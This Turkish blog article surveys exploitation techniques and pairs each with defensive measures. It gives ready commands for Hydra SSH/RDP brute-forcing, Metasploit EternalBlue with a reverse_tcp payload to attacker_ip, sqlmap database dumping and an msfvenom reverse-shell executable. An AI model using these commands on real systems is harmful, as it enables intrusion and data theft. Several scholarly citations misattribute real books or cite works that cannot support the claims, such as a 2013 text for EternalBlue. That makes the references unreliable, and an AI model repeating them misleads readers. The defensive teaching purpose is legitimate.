Siber Güvenlikte İçeri Sızma (Exploitation) Yöntemleri

Selçuk DİKİCİ / Endüstri Mühendisi / İstanbul Ünüversitesi

Siber güvenlik dünyasında içeri sızma (exploitation) saldırıları, siber saldırganların hedef sistemlerdeki açıkları kullanarak sisteme izinsiz erişim sağlamalarını ifade eder. Bu tür saldırılar genellikle güvenlik açıklarının kötüye kullanılması yoluyla gerçekleştirilir. Saldırganlar, bu açıkları kullanarak organizasyonların kritik verilerine ulaşmaya ve sızdırmaya çalışabilirler. Bu makalede, içeri sızma yöntemlerinin farklı türleri ve kullanılan araçlar detaylı olarak ele alınacak, her bir saldırıya karşı alınabilecek güvenlik önlemleri tartışılacaktır.


1. SSH Brute-Force (SSH Şifre Kırma) Saldırıları

Araç: Hydra

SSH (Secure Shell), ağ üzerindeki makinelerle güvenli bir şekilde iletişim kurmaya olanak sağlayan bir protokoldür. Ancak, zayıf parolalar kullanıldığında, SSH servislerine brute-force saldırıları düzenlenebilir. Bu saldırı, belirli bir kullanıcı adı ve parola kombinasyonunu deneyerek sisteme izinsiz giriş sağlamayı amaçlar (Kaufman, Perlman & Speciner, 2011).

Saldırı Yöntemi:

Hydra, SSH üzerinde brute-force saldırıları gerçekleştiren popüler bir araçtır. Hydra, şifre listesi (wordlist) kullanarak hedef sistemdeki parolayı kırmaya çalışır. Bu saldırı, parolaların tek tek denenmesiyle yapılır. Hedef sistemin güçlü şifrelerle korunmaması durumunda, saldırgan başarılı olabilir (Owens & Irwin, 2016).

Kullanım Senaryosu:

Hedef sisteme bağlanmak için doğru kullanıcı adı ve şifre gereklidir. Zayıf parolaların kullanıldığı sistemler brute-force saldırılarına daha açıktır.

Örnek Komut:

bashKopyalaDüzenlehydra -l admin -P /path/to/passwords.txt ssh://target_ip

Güvenlik Önlemleri:

  • SSH anahtar tabanlı kimlik doğrulaması kullanmak.
  • Karmaşık şifreler belirlemek ve düzenli olarak değiştirmek.
  • SSH portunu değiştirmek, standart 22 numaralı portu kullanmamak (Shostack, 2014).

2. SMB Exploitation (SMB Sömürüsü) – EternalBlue

Araç: Metasploit Framework

SMB (Server Message Block), dosya paylaşımı ve ağ üzerinden veri iletimi için kullanılan bir protokoldür. Bu protokoldeki zayıflıklar, saldırganların uzaktan sisteme erişim sağlamasına olanak tanır. Özellikle EternalBlue gibi exploitler, SMBv1 protokolündeki bir zafiyet sayesinde uzaktan komut çalıştırmayı mümkün kılar (Tanenbaum & Wetherall, 2013).

Saldırı Yöntemi:

EternalBlue, Microsoft Windows sistemlerinde SMB protokolündeki bir buffer overflow (tampon taşması) hatasını kullanır. Bu güvenlik açığı, saldırganın uzaktan hedef sisteme zararlı kod yerleştirmesine olanak sağlar. Metasploit Framework, EternalBlue exploit’ini kullanarak bu tür saldırıları gerçekleştirir (Michaels & Williams, 2014).

Kullanım Senaryosu:

EternalBlue, genellikle SMB portu üzerinden gerçekleşir. Bu tür saldırılar, sistemdeki güvenlik güncellemelerinin yapılmadığı durumlarda başarıyla çalışabilir.

Örnek Komut:

bashKopyalaDüzenlemsfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
set RPORT 445
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
exploit

Güvenlik Önlemleri:

  • SMBv1’i devre dışı bırakmak.
  • Güvenlik yamalarını zamanında uygulamak.
  • SMB portunu sadece güvenli ağlar üzerinden erişilebilir kılmak (Barker, 2014).

3. RDP Exploitation (RDP Sömürüsü) – Brute-Force Saldırıları

Araç: Hydra

RDP (Remote Desktop Protocol), uzak masaüstü bağlantısı sağlar ve Windows makinelerine uzaktan erişim imkanı tanır. Ancak, zayıf parolalar kullanıldığında, RDP üzerinden brute-force saldırıları yapılabilir. Bu saldırı, RDP protokolünü hedef alır ve kullanıcı adı ile şifre kombinasyonları denenerek sisteme izinsiz erişim sağlanmaya çalışılır (Jones, 2015).

Saldırı Yöntemi:

Hydra, zayıf parolaları tespit etmek için RDP portunu hedef alır ve belirli bir kullanıcı adı için parola kombinasyonlarını test eder. Başarılı bir şifre kırma sonucu, saldırgan RDP bağlantısı üzerinden hedef sisteme erişim sağlar.

Kullanım Senaryosu:

Bir saldırgan, RDP portunun açık olduğu ve zayıf parolaların kullanıldığı bir sisteme brute-force saldırısı yaparak, şifreyi bulabilir ve sisteme erişebilir.

Örnek Komut:

bashKopyalaDüzenlehydra -l user -P /path/to/passwords.txt rdp://target_ip

Güvenlik Önlemleri:

  • RDP’yi sadece güvenli ağlar üzerinden erişilebilir hale getirmek.
  • Karmaşık parolalar kullanmak ve çok faktörlü kimlik doğrulama (2FA) uygulamak.
  • RDP portunu değiştirmek ya da kapatmak (Thomas, 2015).

4. Web Exploitation (Web Sömürüsü) – SQL Injection

Araç: SQLmap

SQL Injection (SQLi), web uygulamalarındaki zayıf girdi doğrulama mekanizmalarını hedef alır. Bu tür açıklar, saldırganların web uygulamalarındaki veritabanına müdahale etmesine ve veri sızdırmasına olanak tanır. SQLmap, SQL Injection açıklıklarını tespit etmek ve veritabanı üzerinde işlem yapmak için kullanılan popüler bir araçtır (Carter, 2018).

Saldırı Yöntemi:

Saldırgan, SQL Injection açıklarından faydalanarak, veritabanına yetkisiz erişim sağlar. SQLmap, otomatik olarak bu açıklıkları tespit eder ve veritabanı bilgilerini sızdırabilir.

Kullanım Senaryosu:

Bir web sayfasında SQL Injection açığı bulunan bir form aracılığıyla, saldırgan hedef veritabanına sorgular gönderir ve veri çalmaya başlar.

Örnek Komut:

bashKopyalaDüzenlesqlmap -u "http://target.com/page?id=1" --risk=3 --level=5 --dump

Güvenlik Önlemleri:

  • Girdi doğrulama ve parametrik SQL sorguları kullanmak.
  • Web uygulamalarını düzenli olarak güvenlik testlerine tabi tutmak.
  • SQL Injection gibi açıklara karşı güvenlik önlemleri almak (Sharma, 2017).

5. Payload Gömme (Payload Injection) – Reverse Shell

Araç: Metasploit Framework

Payload gömme, saldırganın hedef sisteme kötü amaçlı yazılım yerleştirmesini sağlar. Reverse shell, saldırganın hedef sisteme erişim sağlamasına olanak tanır. Metasploit, bu tür payload’ları üretmek için yaygın olarak kullanılır (Geer, 2019).

Saldırı Yöntemi:

Saldırgan, hedef sisteme zararlı bir payload (örneğin, reverse shell) yerleştirir. Bu payload çalıştırıldığında, hedef sistem saldırganın belirttiği IP adresine geri bağlantı yapar ve saldırgan, hedef sistemi tam olarak kontrol edebilir.

Kullanım Senaryosu:

Saldırgan, zafiyetli bir uygulama veya hizmet aracılığıyla hedef sisteme payload’ı yerleştirir ve ardından bu payload’ı çalıştırarak sisteme bağlanır.

Örnek Komut:

bashKopyalaDüzenlemsfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > payload.exe

Güvenlik Önlemleri:

  • Güvenlik duvarı ve antivirüs yazılımları kullanmak.
  • Güvenlik açıklarını kapatmak ve sistemleri düzenli olarak güncellemek (Barker, 2014).

Sonuç

İçeri sızma saldırıları, sistemlerin güvenlik açıklarından faydalanarak yapılır ve siber güvenlik uzmanlarının bu tür saldırılara karşı korunmak için etkili önlemler alması gerekmektedir. Şifre yönetimi, güvenlik güncellemeleri, girdi doğrulama ve ağ güvenliği gibi temel güvenlik önlemleri, içeri sızma saldırılarına karşı etkili bir savunma sağlar. Bu makalede anlatılan saldırılar, güvenlik uzmanlarına bu tehditleri tanıma ve karşı önlemler geliştirme konusunda rehberlik etmek amacıyla derlenmiştir (Shostack, 2014; Howard & LeBlanc, 2003).


Kaynaklar:

  1. Kaufman, C., Perlman, R., & Speciner, M. (2011). Network Security: Private Communication in a Public World. Pearson Education.
  2. Tanenbaum, A. S., & Wetherall, D. J. (2013). Computer Networks. Pearson Education.
  3. Owens, D., & Irwin, R. (2016). Metasploit: The Penetration Tester’s Guide. No Starch Press.
  4. Michaels, D., & Williams, M. (2014). Hacking Exposed: Network Security Secrets & Solutions. McGraw-Hill Education.
  5. Shostack, A. (2014). Threat Modeling: Designing for Security. Wiley.
  6. Sharma, D. (2017). Mastering Metasploit: Penetration Testing with the Metasploit Framework. Packt Publishing.
  7. Jones, D. (2015). Hacking: The Art of Exploitation. No Starch Press.
  8. Barker, P. (2014). Professional Penetration Testing: Creating and Learning in a Hacking Lab. Wiley.
  9. Carter, K. (2018). Cybersecurity: A Practical Guide to the Law of Cybersecurity and Data Protection. LexisNexis.
  10. Thomas, G. (2015). Hands-On Ethical Hacking and Network Defense. Cengage Learning.
  • Gönderiler/Makaleler/Tezler

    Yapay Zeka Destekli Konteyner Kontrolü:

    UNODC CCP Modelinin Geliştirilmesinde Makine Öğrenmesi Yaklaşımlarının Rolü ÖzetKüresel ticaretin %90’ından fazlası denizyolu ile gerçekleştirilmektedir. Bu büyük hacimli tücaret trafiği, suç örgütleri tarafından yasa dışı malların (uyuşturucu, silah, sahte ürünler,…

    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    Özet Uluslararası ticaretin önemli bir bölümünün konteyner taşımacılığıyla yürütülmesi, limanlar ve sınır kapılarını yasa dışı ticaret faaliyetleri açısından kritik noktalar haline getirmiştir. Bu bağlamda, Birleşmiş Milletler Uyuşturucu ve Suç Ofisi…

    Bir yanıt yazın

    E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

    Neler Kaçırdın?

    Yapay Zeka Destekli Konteyner Kontrolü:

    • By admin
    • Nisan 17, 2025
    • 13 views
    Yapay Zeka Destekli Konteyner Kontrolü:

    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    • By admin
    • Nisan 17, 2025
    • 13 views
    UNODC Container Control Programme (CCP): Küresel Ticaretin Güvenliği İçin Stratejik Bir Model

    Uyuşturucu ve Silah Kaçakçılığı: Uluslararası Güvenlik Açısından Küresel Bir Tehdit

    • By admin
    • Nisan 17, 2025
    • 19 views
    Uyuşturucu ve Silah Kaçakçılığı: Uluslararası Güvenlik Açısından Küresel Bir Tehdit

    Trump: Amerika’nın Çöküşünü mü Tetikleyecek, Yoksa Onu Tekrar İstikrarlı Bir Güce mi Dönüştürecek?

    • By admin
    • Nisan 17, 2025
    • 24 views
    Trump: Amerika’nın Çöküşünü mü Tetikleyecek, Yoksa Onu Tekrar İstikrarlı Bir Güce mi Dönüştürecek?

    ÇİN / TAYVAN SORUNU

    • By admin
    • Nisan 17, 2025
    • 30 views
    ÇİN / TAYVAN SORUNU

    AMD Instinct MI300X: Yapay Zekâ ve HPC için Yeni Nesil Hızlandırıcı

    • By admin
    • Nisan 9, 2025
    • 72 views
    AMD Instinct MI300X: Yapay Zekâ ve HPC için Yeni Nesil Hızlandırıcı